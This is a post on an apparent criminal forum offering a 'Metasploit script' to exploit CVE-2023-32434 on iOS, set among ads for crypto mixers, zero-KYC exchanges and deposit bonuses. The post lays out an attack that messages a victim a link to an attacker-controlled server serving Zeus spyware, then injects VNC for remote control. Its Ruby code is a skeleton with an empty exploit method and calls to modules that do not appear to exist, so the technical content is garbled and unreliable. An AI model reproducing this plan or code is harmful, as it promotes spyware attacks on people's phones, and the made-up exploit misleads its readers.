Welcome to the Off-Shore Club

The #1 Social Engineering Project in the world since 2004 !

Important Notice:

✅UPGRADE YOUR ACCOUNT TODAY TO ACCESS ALL OFF-SHORE FORUMS✅

[New]Telegram Channel

In case our domain name changes, we advise you to subscribe to our new TG channel to always be aware of all events and updates -
https://t.me/rtmsechannel

OFF-SHORE Staff Announcement: 30% Bonus on ALL Wallet Deposit this week


For example, if you deposit $1000, your RTM Advertising Balance will be $1300 that can be used to purchase eligible products and service on forums or request withdrawal. The limit deposit to get the 30% bonus is $10,000 for a $3000 Marketplace wallet balance Bonus.

Deposit Now and claim 30% more balance ! - BTC/LTC/XMR


Always use a Mixer to keep Maximum anonimity ! - BTC to BTC or BTC to XMR

💣Exploit Metasploit script to exploit CVE-2023-32434

⚠️Always Remember to keep your identity safe by using a Zero-KYC Zero-AML like https://coinshift.money⚠️

Gold

ROOT

SENSE!
Verified Seller
Instructor
USDT(TRC-20)
$0.0
Metasploit script to exploit CVE-2023-32434

First, you need to create a Metasploit module for CVE-2023-32434. This can be done by creating a new file in the msf5/modules/exploits/ directory. Let's call it exploit/ios/messages/cve_2023_32434.rb.

Code:
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Msf::PlatformCmdShell
  include Msf::Exploit::Remote::Seclists
  include Msf::Exploit::Remote::IOS::Messages

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CVE-2023-32434 iOS Message Exploit',
      'Description' => %q{
        This module exploits CVE-2023-32434 to gain code execution on a vulnerable iOS device.
      },
      'Author' => [ 'Your Name' ],
      'License' => MSF_LICENSE,
      'Platform' => [ 'ios' ],
      'SessionTypes' => [ 'meterpreter' ],
      'Targets' => [
        [ 'iOS 15.0', { 'arch' => 'arm' } ],
      ],
      'DisclosureDate' => '2023-03-01',
      'DefaultTarget' => 0))
  end

  def exploit
    # Implement the exploit here
  end
end

2- In the exploit method, you need to implement the actual exploit. This will involve sending a specially crafted message to the victim's device. The message should contain a link to a server that you control. When the victim's device receives the message, it will automatically connect to your server.


Code:
  def exploit
    print_status("Sending message to victim...")
    send_message(peer, payload.encoded, 'text/html')
    handler
  end


3-The server that the victim's device connects to should serve a page that contains the zeus spyware. When the page is loaded, the spyware will be installed on the victim's device.

4-To gain a VNC session, you can use the post/multi/manage/vnc_inject module in Metasploit. This module will inject a VNC server into the victim's device, which you can then connect to.

Code:
  def on_new_session(client)
    print_good("Session established!")
    vnc_inject = client.framework.modules.create('post/multi/manage/vnc_inject')
    vnc_inject.exploit_target = target
    vnc_inject.run
    print_status("VNC server injected. Connecting...")
    vnc = client.framework.modules.create('post/multi/manage/vnc')
    vnc.exploit_target = target
    vnc.run
  end
 
Last edited:

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Friendly Disclaimer We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use RTM Escrow on Telegram
Gold
Mitalk.lat official Off Shore Club Chat


Gold

Panel Title #1

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Panel Title #2

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Top